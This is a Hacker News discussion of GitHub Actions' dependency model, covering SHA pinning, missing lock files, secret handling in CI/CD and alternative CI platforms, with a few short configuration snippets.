GitHub Actions has a package manager, and it might be the worst
Posted by robin_reala 2 days ago
Comments
Comment by bloppe 1 day ago
- Using the commit SHA of a released action version is the safest for stability and security.
- If the action publishes major version tags, you should expect to receive critical fixes and security patches while still retaining compatibility. Note that this behavior is at the discretion of the action's author.
So you can basically implement your own lock file, although it doesn't work for transitive deps unless those are specified by SHA as well, which is out of your control. And there is an inherent trade-off in terms of having to keep abreast if critical security fixes and updating your hashes, which might count as a charitable explanation for why using hashes is less prevalent.
Comment by onionisafruit 1 day ago
Sure you can implement it yourself for direct dependencies and decide to only use direct dependencies that also use commit sha pinning, but most users don’t even realize it’s a problem to begin with. The users who know often don’t bother to use shas anyway.
Or GitHub could spend a little engineer time on a feasible lock file solution.
I say this as somebody who actually likes GitHub Actions and maintains a couple of somewhat well-used actions in my free time. I use sha pinning in my composite actions and encourage users to do the same when using them, but when I look at public repos using my actions it’s probably 90% using @v1, 9% @v1.2 and 1% using commit shas.
[0] Actions was the first Microsoft-led project at GitHub — from before the acquisition was even announced. It was a sign of things to come that something as basic as this was either not understood or swept under the rug to hit a deadline.
Comment by amake 1 day ago
So in other words the strategy in the docs doesn't actually address the issue
Comment by WillDaSilva 1 day ago
Comment by nextaccountic 1 day ago
Comment by bramblerose 1 day ago
This is not true for stability in practice: the action often depends on a specific Node version (which may not be supported by the runner at some point) and/or a versioned API that becomes unsupported. I've had better luck with @main.
Comment by bloppe 1 day ago
Comment by Dylan16807 1 day ago
Comment by csomar 1 day ago
Comment by Griffinsauce 11 hours ago
Comment by saagarjha 2 days ago
Comment by wnevets 1 day ago
That isn't gonna get better anytime soon.
"GitHub Will Prioritize Migrating to Azure Over Feature Development" [1]
[1] https://thenewstack.io/github-will-prioritize-migrating-to-a...
Comment by amarant 1 day ago
Comment by phantasmish 1 day ago
Retrofitting that into "cloud" bullshit is such a bad idea.
Comment by theamk 1 day ago
Using bare-metal requires competent Unix admins, and Actions team is full of javascript clowns (see: decision to use dashes in environment variable; lack of any sort of shell quoting support in templates; keeping logs next to binaries in self-hosted runners). Perhaps they would be better off using infra someone else maintains.
Comment by godelski 1 day ago
> requires competent Unix admins
Who knows where a $3.7T company is ever going to find competent Unix admins... > Perhaps they would be better off using infra someone else maintains.
They're handing it from themselves to themselves. We're talking about Microsoft, not some startup.Comment by dijit 1 day ago
So does running VMs in a cloud provider.
Except now we call them "DevOps" or "SRE" and pay them 1.5-2x.
(as a former SRE myself, I'm not complaining).
Comment by gregoryl 20 hours ago
We had a critical outage because they deprecated Windows 2019 agents a month earlier than scheduled. MS support had the gall to both blame us for not migrating sooner, and refuse to escalate for 36 hours!
Comment by sebazzz 1 day ago
Comment by mixedbit 1 day ago
Comment by Normal_gaussian 1 day ago
GitHub also runs a free tier with significant usage.
There are ~1.4b paid instances of Windows 10/11 desktop; and ~150m Monthly active accounts on GitHub, of which only a fraction are paid users.
Windows is generating something in the region of $30b/yr for MS, and GitHub is around $2b/yr.
MS have called out that Copilot is responsible for 40% of revenue growth in GitHub.
Windows isn't what developers buy, but it is what end users buy. There are a lot more end users than developers. Developers are also famously stingy. However, in both products the margin is in the new tech.
Comment by tonyhart7 1 day ago
but github is pair well with MS other core product like Azure and VS/VSC department
MS has a good chance to have vertical integration on how software get written from scratch to production, if they can somehow bundle everything to all in one membership like Google one subs, I think they have a good chance
Comment by samhh 1 day ago
Comment by servercobra 1 day ago
Only downside is they never got back to us about their startup discount.
Comment by bksmithconnor 1 day ago
could you shoot me your GH org so I can apply your startup discount? feel free to reach out to support@blacksmith.sh and I'll get back to you asap. thanks for using blacksmith!
Comment by servercobra 1 day ago
Comment by 999900000999 1 day ago
GitHub actions more or less just work for what most people need. If you have a complex setup, use a real CI/CD system.
Comment by lijok 1 day ago
Comment by bastardoperator 1 day ago
Comment by 999900000999 1 day ago
GitHub Actions are really for just short scripts. Don't take your Miata off road.
Comment by bastardoperator 1 day ago
https://github.com/jenkinsci/jenkins/tree/master/.github/wor...
Comment by cyberpunk 1 day ago
Comment by 999900000999 1 day ago
It's a bit bloated, but it's free and works.
Comment by lijok 1 day ago
Comment by 999900000999 1 day ago
I get the vibe it was never intended to seriously compete with real CI/CD systems.
But then people started using it as such, thus this thread is full of complaints.
Comment by lijok 1 day ago
Comment by drdrey 1 day ago
Comment by LilBytes 1 day ago
Comment by kylegalbraith 1 day ago
Comment by kylegalbraith 1 day ago
Comment by herpdyderp 1 day ago
Comment by kylegalbraith 1 day ago
Comment by whiskey-one 21 hours ago
Comment by herpdyderp 1 day ago
Comment by eviks 1 day ago
Comment by blibble 1 day ago
and switch everyone to the dumpster fire that is Azure DevOps
and if you thought GitHub Actions was bad...
Comment by everfrustrated 1 day ago
The GitHub Actions runner source code is all dotnet. GitHub was a Ruby shop.
Comment by fuzzy2 1 day ago
From my perspective, Azure Pipelines is largely the same as GitHub Actions. I abhor this concept of having abstract and opaque “tasks”.
Comment by WorldMaker 1 day ago
Microsoft claims Azure DevOps still has a roadmap, but it's hard to imagine that the real roadmap isn't simply "Wait for more VPs in North Carolina to retire before finally killing the brand".
Comment by re-thc 1 day ago
> and switch everyone to the dumpster fire that is Azure DevOps
The other way around. Azure DevOps is 1/2 a backend for Github these days. Github re-uses a lot of Azure Devops' infrastructure.
Comment by rurban 1 day ago
Comment by Hamuko 1 day ago
I guess Bitbucket is cheaper but you'll lose the savings in your employees bitching about Bitbucket to each other on Slack.
Comment by blackqueeriroh 1 day ago
Comment by Hamuko 1 day ago
Comment by nevon 2 hours ago
Now for the people who were operating Bitbucket, I'm sure it's a relief.
Comment by Ygg2 1 day ago
What if GH actions is considered legacy business in favour of LLMs?
Comment by silverwind 1 day ago
Comment by crote 1 day ago
Comment by coryrc 1 day ago
i.e. from https://github.com/actions/cache/?tab=readme-ov-file#note
Thank you for your interest in this GitHub repo, however, right now we are not taking contributions.
We continue to focus our resources on strategic areas that help our customers be successful while making developers' lives easier. While GitHub Actions remains a key part of this vision, we are allocating resources towards other areas of Actions and are not taking contributions to this repository at this time. The GitHub public roadmap is the best place to follow along for any updates on features we’re working on and what stage they’re in.Comment by crote 1 day ago
Comment by everfrustrated 1 day ago
They will occasionally make changes if it aligns with a new product effort driven from within the org.
Saying they're dropping support is a stretch esp as very few people actually pay for their Support package anyway..... (Yes they do offer it as a paid option to Enterprise customers)
Comment by saagarjha 1 day ago
Comment by conartist6 1 day ago
Comment by weikju 1 day ago
Comment by captn3m0 1 day ago
> Instead of writing bespoke scripts that operate over GitHub using the GitHub API, you describe the desired behavior in plain language. This is converted into an executable GitHub Actions workflow that runs on GitHub using an agentic "engine" such as Claude Code or Open AI Codex. It's a GitHub Action, but the "source code" is natural language in a markdown file.
Comment by woodruffw 1 day ago
Comment by kokada 1 day ago
Edit: ok, looking at example it makes more sense. The idea is to run specific actions that are probably not well automated, like generating and keeping documentation up-to-date. I hope people don't use it to automate things like CI runs though.
Comment by imglorp 1 day ago
Comment by anentropic 1 day ago
Comment by ptx 1 day ago
Comment by WorldMaker 1 day ago
Comment by Bombthecat 1 day ago
Comment by souenzzo 1 day ago
Comment by bilekas 1 day ago
Comment by Cthulhu_ 1 day ago
(we run a private gitlab instance and a merge request can spawn hundreds of jobs, that's a lot of potential Gitlab credits)
Comment by mhitza 1 day ago
Actions is one thing, but after all these years where the new finegrained access tokens aren't still supported across all the product endpoints (and the wack granularity) is more telling about their lack of investment in maintenance.
Comment by vbezhenar 1 day ago
Comment by miohtama 1 day ago
These include
- Gitlab
Open source:
- https://concourse-ci.org/ (discussed in the context of Radicle here https://news.ycombinator.com/item?id=44658820 )
- Jenkins
-etc.
Anyone can complain as much as they want, but unless they put the money where their mouth is, it's just noise from lazy people.
Comment by saagarjha 1 day ago
Comment by rjzzleep 1 day ago
How did we go in 20 years from holding these companies to account when they'd misbehave to acting as if they are poor damsels in distress whenever someone points out a flaw?
Comment by drdec 1 day ago
Honestly I think the problem is more a rosy view of the past versus any actual change in behavior. There have always been defenders of such companies.
Comment by hexbin010 1 day ago
They hired a ton of people on very very good salaries
Comment by tonyhart7 1 day ago
You better thank god for MS for being lazy and incompetent, the last thing we want for big tech is being innovative and have a stronger monopoly
Comment by nsoqm 1 day ago
The opposite, to be lazy and to continue giving them money whilst being unhappy with what you get in return, would actually be more like defending the companies.
Comment by ImPostingOnHN 1 day ago
The opposite we see here: to not criticize them; to blame Microsoft's failure on the critics; and even to discourage any such criticism, are actually more like defending large companies.
Comment by miohtama 1 day ago
This especially includes governments and other institutional buyers.
Comment by thrdbndndn 1 day ago
Their size or past misbehaviors shouldn't be relevant to this discussion. Bringing those up feels a bit like an ad hominem. Whether criticism is valid should depend entirely on how GitHub Actions actually works and how it compares to similar services.
Comment by gcr 1 day ago
Comment by Sl1mb0 1 day ago
Comment by thrdbndndn 1 day ago
Comment by Tostino 1 day ago
Comment by wizzwizz4 1 day ago
If the past misbehaviours are exactly the same shape, there's not all that much point re-hashing the same discussion with the nouns renamed.
Comment by ironmagma 1 day ago
Comment by rjzzleep 1 day ago
Here we are talking about one of the worlds most valuable companies that gets all sorts of perks, benefits and preferential treatment from various entities and governments on the globe and somehow we have to be grateful when they deliver garbage while milking the business they bought.
Comment by ironmagma 1 day ago
Comment by baq 1 day ago
Comment by ironmagma 1 day ago
Comment by baq 1 day ago
Comment by ironmagma 1 day ago
And besides that, a lot of people on here do pay for Github in the first place.
Comment by XCabbage 1 day ago
(I find it extremely sketchy from a competition law perspective that Microsoft, as the owner of npm, has implemented a policy banning npm publishers from publishing via competitors to GitHub Actions - a product that Microsoft also owns. But they have; that is the reality right now, whether it's legal or not.)
Comment by woodruffw 1 day ago
(It can also be extended to arbitrary third party IdPs, although the benefit of that is dependent on usage. But if you have another CI/CD provider that you’d like to integrate into PyPI, you should definitely flag it on the issue tracker.)
Comment by LtWorf 1 day ago
Comment by ChrisMarshallNY 1 day ago
I used to work for a Japanese company, and one of their core philosophies was “Don’t complain, unless you have a solution.” In my experience, this did not always have optimal outcomes: https://littlegreenviper.com/problems-and-solutions/
Comment by hrimfaxi 1 day ago
Comment by ChrisMarshallNY 1 day ago
Comment by klausa 1 day ago
Comment by miohtama 1 day ago
Comment by klausa 1 day ago
Just refuse to do my job because I think the tools suck?
Comment by weakfish 1 day ago
So I’m part of the problem? Me specifically?
Comment by CamouflagedKiwi 1 day ago
I used Travis rather longer ago, it was not great. Circle was a massive step forward. I don't know if they have improved it since but it only felt useful for very simplistic workflows, as soon as you needed anything complex (including any software that didn't come out of the box) you were in a really awkward place.
Comment by Griffinsauce 10 hours ago
Comment by olafmol 1 day ago
For some examples of more advanced usecases take a look: https://circleci.com/blog/platform-toolkit/
Disclaimer: i work for CircleCI.
Comment by CamouflagedKiwi 3 hours ago
Also, honestly, I don't care about any of those features. The main thing I want is a CI system that is fast and customisable and that I don't have to spend a lot of time debugging. I think CircleCI is pretty decent in that regard (the "rerun with SSH" thing is way better than anything else I've seen) but it doesn't seem to be getting any better over time (e.g. caching is still very primitive and coarse-grained).
Comment by aprilnya 1 day ago
Comment by gabrielgio 1 day ago
Once I'm encharged of budge decisions of my company I'll make sure that none will go to any MS and Atlassian product. Until then I'll keep complaining.
Comment by c0balt 1 day ago
Comment by Bombthecat 1 day ago
Comment by koakuma-chan 1 day ago
Comment by dimgl 1 day ago
Comment by IshKebab 1 day ago
Github Actions is actually one of the better CI options out there, even if on an absolute scale it is still pretty bad.
As far as I can tell nobody has made a CI system that is actually good.
Comment by rileymichael 1 day ago
really surprised there are no others though. dagger.io was in the space but the level of complexity is an order of magnitude higher
Comment by kspacewalk2 1 day ago
Comment by IshKebab 1 day ago
Comment by no_wizard 1 day ago
Comment by Marsymars 1 day ago
Comment by NamlchakKhandro 1 day ago
Don't waste your time
Comment by zulban 1 day ago
Comment by ramon156 1 day ago
Comment by input_sh 1 day ago
What that type of section usually means is "there's someone from Microsoft that signed up for our service using his work account", sometimes it means "there's some tiny team within Microsoft that uses our product", but it very rarely (if ever) means "the entire company is completely reliant on our product".
Comment by SkyPuncher 1 day ago
Comment by baq 1 day ago
My biggest concern with it is that it’s somehow the de facto industry standard. You could do so much better with relatively small investments, but MS went full IE6 with it… and now there’s a whole generation of young engineers who don’t know how short their end of the stick actually is since they never get to compare it to anything.
Comment by bjackman 1 day ago
Personally I've just retired a laptop and I'm planning to turn it into a little home server. I think I'm gonna try spinning up Woodpecker on there, I'm curious to see what a CI system people don't hate is like to live with!
Comment by kminehart 1 day ago
steps:
- name: backend
image: golang
commands:
- go build
- go test
- name: frontend
image: node
commands:
- npm install
- npm run test
- npm run build
Yes, it's easy to read and understand and it's container based, so it's easy to extend. I could probably intuitively add on to this. I can't say the same for GitHub, so it has that going for it.But the moment things start to get a little complex then that's when the waste starts happening. Eventually you're going to want to _do_ something with the artifacts being built, right? So what does that look like?
Immediately that's when problems start showing up...
- You'll probably need a separate workflow that defines the same thing, but again, only this time combining them into a Docker image or a package.
- I am only now realizing that woodpecker is a fork of Drone. This was a huuuge issue in Drone. We ended up using Starlark to generate our drone yaml because it lacked any kind of reusability and that was a big headche.
- If I were to only change a `frontend` file or a `backend` file, then I'm probably going to end up wasting time and compute rebuilding the same artifacts over and over. - GitHub's free component honestly hurts itself here. I don't have to care about waste if it's mostly free anyways.
- Running locally using the local backend... looks like a huge chore. In Drone this was basically impossible.I really wish someone would take a step back and really think about the problems being solved here and where the current tooling fails us. I don't see much effort being put into the things that really suck about github actions (at least for me): legibility, waste, and the feedback loop.
Comment by duped 1 day ago
By adding one file to your git repo, you get cross-platform build & test of your software that can run on every PR. If your code is open source, it's free(ish) too.
It feels like a weekend project that a couple people threw together and then has been held together by hope and prayers with more focus on scaling it than making it well designed.
Comment by mvc 1 day ago
I'm from a generation who had to use VSS for a few years. The sticks are pretty long these days, even the ones you get from github.
Comment by ChrisMarshallNY 1 day ago
I just had trauma!
I will say that SourceSafe had one advantage: You could create "composite" proxy workspaces.
You could add one or two files from one workspace, and a few from another, etc. The resulting "avatar" workspace would act like they were all in the same workspace. It was cool.
However, absolutely everything else sucked.
I don't miss it.
Comment by gcr 1 day ago
(Git has octopus merges, jj just calls them “merge commits” even though they may have more than two parents)
Comment by ChrisMarshallNY 1 day ago
Git has the concept of "atomic repos." Repos are a single unit, including all files, branches, tags, etc.
Older systems basically had a single repo, with "lenses" into sections of the repo (usually called "workspaces," or somesuch. VSS called them something else, but I can't remember).
I find the atomic repo thing awkward; especially wrt libraries. If I include a package, I get the whole kit & kaboodle; including test harnesses and whatnot. My libraries thend to have a lot more testing code than library code.
Also, I would love to create a "dependency repo," that aggregates the exported parts of the libraries that I'm including into my project, pinned at the required versions. I guess you could say package managers are that, but they are kind of a blunt instrument. Since I eat my own dog food, I'd like to be able to write changes into the dependency, and have them propagate back to their home repo, which I can sort of do now, if I make it a point to find the dependency checkout, make a change, then push that change, but it's awkward.
But that seems crazy complex (and dangerous), so I'm OK with the way things work now.
Comment by gcr 1 day ago
Both git and jj have sparse checkouts these days, it sounds like you’d be into that
Do you vendor the libraries you use? Python packages typically don’t include the testing or docs in wheels uploaded to PyPI, for instance
These days in Pythonland, it’s typical to use a package manager with a lockfile that enforces build reproducibility and SHA signatures for package attestation. If you haven’t worked with tools like uv, you might like their concepts (or you might be immediately put off by their idea of hermetically isolated environments idk)
Comment by ChrisMarshallNY 1 day ago
You can see most of my stuff in GH. You need to look at the organizations, as opposed to my personal repos: https://github.com/ChrisMarshallNY#browse-away
Thanks for the heads-up. I'll give it a gander.
Comment by baq 1 day ago
in a centralized VCS there are viable CICD options like 'check the compiler binaries in' or even 'check the whole builder OS image in' which git is simply not able to handle by design and needs extensions to work around deficiencies. git winning the mindshare battle made these a bit forgotten, but they were industry standard a couple decades ago.
Comment by cindyllm 1 day ago
Comment by andrewaylett 1 day ago
We moved from VSS to SVN, and it took a little encouraging for the person who had set up our branching workflow using that VSS feature to be happy losing it if that freed us from VSS.
Comment by zahlman 1 day ago
Comment by pjc50 1 day ago
Mind you, CI does always involve a surprising amount of maintenance. Update churn is real. And Macs still are very much more fiddly to treat as "cattle" machines.
Comment by ramon156 14 hours ago
Current job is using blacksmith to save on costs, but the reality of it is that this caching layer only adds costs in some of our projects
Comment by dwroberts 1 day ago
There are so many third party actions where the docs or example reference the master branch. A quick malicious push and they can presumably exfiltrate data from a ton of repositories
(Even an explicit tag is vulnerable because it can just be moved still, but master branch feels like not even trying)
Comment by domenkozar 1 day ago
Comment by no_wizard 1 day ago
Comment by amluto 1 day ago
Why do CI/CD systems need access to secrets? I would argue need access to APIs and they need privileges to perform specific API calls. But there is absolutely nothing about calling an API that fundamentally requires that the caller know a secret.
I would argue that a good CI/CD system should not support secrets as a first-class object at all. Instead steps may have privileges assigned. At most there should be an adapter, secure enclave style, that may hold a secret and give CI/CD steps the ability to do something with that secret, to be used for APIs that don’t support OIDC or some other mechanism to avoid secrets entirely.
Comment by gcr 1 day ago
Let’s just call it secret support.
I agree with your suggestion that capabilities-based APIs are better, but CI/CD needs to meet customers where they’re at currently, not where they should be. Most customers need secrets.
Comment by woodruffw 1 day ago
This all seems right, but the reality is that people will put secrets into CI/CD, and so the platform should provide an at least passably secure mechanism for them.
(A key example being open source: people want to publish from CI, and they’re not going to set up additional infrastructure when the point of using third-party CI is to avoid that setup.)
Comment by amluto 21 hours ago
Comment by qznc 1 day ago
I don't really understand what you mean by "secure enclave style"? How would that be different?
Comment by amluto 1 day ago
I suppose I would make an exception for license keys. Those have minimal blast radii if they leak.
Comment by gcr 1 day ago
Your approach boils down to “lets give each step its own access to its own hardware-protected secrets, but developers shouldn’t otherwise have access”
Which is a great way to “support secrets,” just like the article says.
Comment by PunchyHamster 1 day ago
CI/CD does not exist in the vacuum. If you had CI/CD entirely integrated with the rest of the infrastructure it might be possible to do say an app deploy without passing creds to user code (say have the platform APIs that it can call to do the deployment instead of typical "install the client, get the creds, run k8s/ssh/whatever else needed for deploy").
But that's a high level of integration that's very environment specific, and without all that many positives (so what you don't need creds, you still have permission to do a lot of mess if it gets hijacked), and a lot, lot more code to write vs "run a container and pass it some env vars" that had become a standard
Comment by amluto 1 day ago
On the one hand, CD workflows are less exposed than CI workflows. You only deploy code that has made it through your review and CI processes. In a non-continuous deployment model, you only deploy code when you decide to. You are not running your CD workflow on a third-party pull request.
On the other hand, the actual CD permission is a big deal. If you leak a credential that can deploy to your k8s cluster, you are very, very pwned. Possibly in a manner that is extremely complex to recover from.
I also admit that I find it rather surprising that so many workflows have a push model of deployment like this. My intuition for how to design a CD-style system would be:
1. A release is tagged in source control.
2. Something consumes that release tag and produces a production artifact. This might be some sort of runner that checks out the tagged release, builds it, and produces a ghcr image. Bonus points if that process is cleanly reproducible and more bonus points if there's also an attestation that the release artifact matches the specified tag and all the build environment inputs. (I think that GitHub Actions can do this, other than the bonus points, without any secrets.)
3. Something tells production to update to the new artifact. Ideally this would trigger some kind of staged deployment. Maybe it's continuous, maybe it needs manual triggering. I think that, in many production systems, this could be a message from the earlier stages that tells an agent with production privileges to download and update. It really shouldn't be that hard to make a little agent in k8s or whatever that listens to an API call from a system like GitHub Actions, authenticates it using OIDC, and follows its deployment instructions.
P.S. An attested-reproducible CD build system might be an interesting startup idea.
Comment by PunchyHamster 1 day ago
...but I saw that anti-pattern of "just add a step that does the deploy after CI in same" often enough that I think it might be the most common way to do it.
Comment by Kinrany 1 day ago
Of course the general purpose task runner that both run on does need to support secrets
Comment by arccy 1 day ago
Comment by Kinrany 1 day ago
Comment by Kinrany 1 day ago
Only the CI part needs to build; it needs little else and it's the only part of a coherent setup that needs to build.
Comment by regularfry 1 day ago
Comment by jamescrowley 1 day ago
https://docs.github.com/en/actions/how-tos/secure-your-work/...
Comment by regularfry 1 day ago
Comment by Kinrany 1 day ago
Comment by regularfry 1 day ago
Comment by Kinrany 1 day ago
Comment by everfrustrated 1 day ago
IE no prod access by editing the workflow definition and pushing it to a branch.
Comment by barrkel 1 day ago
Those tests will need creds to access third party database endpoints.
Comment by lionkor 1 day ago
Comment by hinkley 1 day ago
Comment by themafia 1 day ago
Comment by nijave 1 day ago
Comment by gcr 1 day ago
Or: the deployment service knows the identity of the instance, so its secret is its private key
Or, how PyPI does it: the deployment service coordinates with the trusted CI/CD service to learn the identity of the machine (like its IP address, or a trusted assertion of which repository it’s running on), so the secret is handled in however that out-of-band verification step happens. (PyPI communicates with Github Actions about which pipeline from which repository is doing the deployment, for example)
It’s still just secrets all the way down
Comment by mrweasel 1 day ago
But how does the metadata server know that the CI instance is allowed to access the secret? Especially when the CI/CD system is hosted at a 3rd. party. It needs to present some form of credentials. The CI system may also need permission or credentials for a private repository of packages or artifacts needed in the build process.
For me, a CI/CD system needs two things: Secret management and the ability to run Bash.
Comment by gcr 1 day ago
As for deploying from a trusted service without managing credentials, PyPI calls this "trusted publishing": https://docs.pypi.org/trusted-publishers/
From the docs:
1. Certain CI services (like GitHub Actions) are OIDC identity providers, meaning that they can issue short-lived credentials ("OIDC tokens") that a third party can strongly verify came from the CI service (as well as which user, repository, etc. actually executed);
2. Projects on PyPI can be configured to trust a particular configuration on a particular CI service, making that configuration an OIDC publisher for that project;
3. Release automation (like GitHub Actions) can submit an OIDC token to PyPI. The token will be matched against configurations trusted by different projects; if any projects trust the token's configuration, then PyPI will mint a short-lived API token for those projects and return it;
4. The short-lived API token behaves exactly like a normal project-scoped API token, except that it's only valid for 15 minutes from time of creation (enough time for the CI to use it to upload packages).
You have to add your github repository as a "trusted pulbisher" to your PyPI packages.
Honetsly the whole workflow bothers me -- how can PyPI be sure it's talking to github? what if an attacker could mess with PyPI's DNS? -- but it's how it's done.
Comment by woodruffw 1 day ago
Comment by hinkley 1 day ago
I keep meaning to write a partially federated CI tool that uses Prometheus for all of its telemetry data but never get around to it. I ended up carving out a couple other things I’d like to be part of the process as a separate app because I was still getting panopticon vibes and some data should just be private.
Comment by zahlman 1 day ago
There is if you pay for API access, surely?
Comment by nijave 1 day ago
Pedantically I'd say maybe it's more fair to say they shouldn't have access to long lived secrets and should only use short lived values.
The "I" stands for Integration so it's inevitable CI needs to talk to multiple things--at the very least a git repo which most cases requires a secret to pull.
Comment by duped 1 day ago
Because you need to be able to sign/notarize with private keys and deploy to cloud environments. Both of these require secrets known to the runner.
Comment by LtWorf 1 day ago
Comment by cyberax 1 day ago
Github actually is doing something right here. You can set it up as a trusted identity provider in AWS, and then use Github to assume a role in your AWS account. And from there, you can get access to credentials stored in Secret Manager or SSM.
Comment by jdeastwood 1 day ago
Comment by sofixa 1 day ago
Comment by jdeastwood 1 day ago
Comment by sofixa 1 day ago
Comment by DuncanCoffee 1 day ago
- name: Retrieve keystore for apk signing
env:
KEYSTORE: ${{ secrets.KEYSTORE }}
run: echo "$KEYSTORE" | base64 --decode > /home/runner/work/keystore.pfkComment by amluto 21 hours ago
GitHub should instead let you store that key as a different type of secret such that a specific workflow step can sign with it. Then a compromised runner VM could possibly sign something that shouldn’t be signed but could not exfiltrate it.
Even better would be to be able to have a policy that the only thing that can be signed is something with a version that matches the immutable release that’s being built.
Comment by rurban 23 hours ago
I just converted our old parrot travis runners to github actions. There I had constant troubles with travis timeouts of 15m 10 years ago. With the new github actions I can run the full tests (which was not possible with travis) in 3 minutes. About 8x faster hardware.
Comment by bluenose69 1 day ago
I maintain an R package that is quite stable and is widely used. But every month or so, the GHA on one of the R testing machines will report an error. The messages being quite opaque, I typically spend a half hour trying to see if my code is doing something wrong. And then I simply make a calendar item to recheck it each day for a while. Sure enough, the problems always go away after a few days.
This might be specific to R, though.
Comment by OptionOfT 1 day ago
When you have a multi-platform image the actual per-platforms are usually not tagged. No point.
But that doesn't mean that they are untagged.
So on GitHub Actions when you upload a multi-platform image the per-platform show up in the untagged list. And you can delete them, breaking the multi-platform image, as now it points to blobs that don't exist anymore.
Comment by Raed667 1 day ago
> actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744
Comment by cyphar 1 day ago
Comment by barrkel 1 day ago
Comment by Kovah 1 day ago
Positive example: https://github.com/codecov/codecov-action/blob/96b38e9e60ee6... Negative example: https://github.com/armbian/build/blob/54808ecff253fb71615161...
Comment by cedws 1 day ago
Comment by DalekBaldwin 1 day ago
Comment by jnwatson 1 day ago
The main problem, which this article touches, is that GHA adds a whole new dimension of dependency treadmill. You now have a new set of upstreams that you have to keep up to date along with your actual deployment upstreams.
Comment by esafak 1 day ago
Comment by figmert 1 day ago
Comment by RSHEPP 1 day ago
Comment by akvadrako 1 day ago
GitHub actions has some rough edges around caching, but all the packaging is totally unimportant and best avoided.
Comment by worldsayshi 1 day ago
Why not just build the workflows themselves as docker images? I guess running other docker images in the workflow would then become a problem.
Comment by novok 12 hours ago
Comment by shepherdjerred 1 day ago
Comment by worldsayshi 21 hours ago
Also, using the dagger github action should make the transition easier I suppose: https://github.com/dagger/dagger-for-github
Comment by sofixa 1 day ago
Because it's clear to write and read. You don't want your CI/CD logic to end up being spaghetti because a super ninja engineer decided they can do crazy stuff just because they can. Same reason why it's a bad idea to create your infrastructure directly in a programming language (unless creating infrastructure is a core part of your software).
> Why not just build the workflows themselves as docker images? I guess running other docker images in the workflow would then become a problem.
That's how Drone CI handled it. GitLab kind of does the same, where you always start as a docker image, and thus if you have a custom one with an entrypoint, it does whatever you need it to.
Comment by weakfish 1 day ago
YAML is fine for data, but inevitably stuff like workflows end up tacking on imperative features to a declarative language.
Comment by worldsayshi 19 hours ago
Comment by weakfish 18 hours ago
I really really want to use dagger, but I don’t think there’s organizational interest in it.
Comment by sofixa 20 hours ago
You can have conditions and types without having the full flexibility allowing madness of a full language with HCL.
Comment by trueno 1 day ago
Comment by btown 1 day ago
Comment by gwbas1c 18 hours ago
If you do, please submit a "show HN." I'd love to use it.
Comment by nine_k 1 day ago
I hope that Codeberg will become more mainstream for FOSS projects.
I hope another competent player, beside GitLab and Bitbucket, will emerge in the corporate paid space.
Comment by michaelmior 1 day ago
The vast majority of users use GitHub-hosted runners. If you don't trust GitHub, you have bigger problems than whether the correct code for an action is downloaded.
Comment by gwbas1c 18 hours ago
Anyway, software is so complicated that at some level, you need to trust something because it's impossible to personally comprehend and audit all code.
So, you still need to trust git. You still need to trust your OS. You still need to trust the hardware. You just don't have enough minutes in your life to go down through all those levels and understand it well enough to know that there's nothing malicious in there.
Comment by pshirshov 1 day ago
I have a little launcher for that which helps: https://github.com/7mind/mudyla
Comment by Group_B 1 day ago
Comment by alex-ross 1 day ago
Has anyone been bitten by a breaking change from an action update mid-pipeline?
Comment by naikrovek 1 day ago
Comment by asmor 1 day ago
I'm pretty sure it contains the exact line of it being "deeply confused about being a package manager".
Comment by tom1337 1 day ago
I guess the best solution is to just write custom scripts in whatever language one prefers and just call those from the CI runner. Probably missing out on some fancy user interfaces but at least we'd no longer be completely locked into GHA...
Comment by carschno 1 day ago
For those who can still escape the lock-in, this is probably a good occasion to point to Forgejo, an open-source alternative that also has CI actions: https://forgejo.org/2023-02-27-forgejo-actions/ It is used by Codeberg: https://codeberg.org/
Comment by mfenniak 1 day ago
However, as noted in the article, Forgejo's implementation currently has all the same "package manager" problems.
Comment by carschno 1 day ago
Comment by esafak 1 day ago
Comment by zufallsheld 12 hours ago
Comment by timwis 1 day ago
Comment by eYrKEC2 1 day ago
Comment by cyberax 1 day ago
This works well for _most_ things. There are some issues with doing docker-in-docker for volume mapping, but they're mostly trivial. We're using taskfiles to run tasks, so I can just rely on it for that. It also has a built-in support for nice output grouping ( https://taskfile.dev/docs/reference/schema#output ) that Github actions can parse.
Pros:
1. Ability to run things in parallel.
2. Ability to run things _locally_ in a completely identical environment.
3. It's actually faster!
4. No vendor lock-in. Offramp to github runners and eventually local runners?
Cons:
It often takes quite a while to understand how actions work when you want to run them in your own environment. For example, how do you get credentials to access the Github Actions cache and then pass them to Docker? Most of documentation just tells: "Use this Github Action and stop worrying your pretty little head about it".
Comment by IshKebab 1 day ago
Well... not Pip!
Comment by notatallshaw 17 hours ago
Pip has been a flag bearer for Python packaging standards for some time now, so that alternatives can implement standards rather than copy behavior. So first a lock file standard had to be agreed upon which finally happened this year: https://peps.python.org/pep-0751/
Now it's a matter of a maintainer, who are currently all volunteers donating their spare time, to fully implement support. Progress is happening but it is a little slow because of this.
Comment by thangngoc89 1 day ago
Comment by curcbit 1 day ago
Comment by LoganDark 1 day ago
Comment by regularfry 1 day ago
Comment by LoganDark 1 day ago
Comment by sharts 1 day ago
Like, what did one expect?
Comment by ignoramous 1 day ago
Harsh given GitHub makes it very easy to setup attestations for Artifact (like build & sbom) provenances.
That said, Zizmor (static analyser for GitHub Actions) with Step Security's Harden Runner (a runtime analyser) [0] pair nicely, even if the latter is a bit of an involved setup.
[0] https://github.com/step-security/harden-runner
> The fix is a lockfile.
Hopefully, SLSA drafts in Hermetic build process as a requirement: https://slsa.dev/spec/v1.2/future-directions
Comment by woodruffw 1 day ago
Comment by throwawaypath 16 hours ago
Comment by TrianguloY 1 day ago
If I write actions/setup-python@v1, I'm expecting the action to run with the v1 tag of that repository. If I rerun it, I expect it to run with the v1 tag of that repository...which I'm aware may not be the same if the tag was updated.
If I instead use actions/setup-python@27b31702a0e7fc50959f5ad993c78deac1bdfc29 then I'm expecting the action to run with that specific commit. And if I run it again it will run with the same commit.
So, whether you choose the tag or the commit depends on whether you trust the repository or not, and if you want automatic updates. The option is there...isn't it?
Comment by barrkel 1 day ago
Comment by TrianguloY 1 day ago
Comment by eviks 1 day ago
That's the mistake that breaks the following. People don't usually expect that it's an arbitrary modifiable reference, but instead that it's the same version they've picked when they created the file (ie a tag is just a human friendly name for a commit)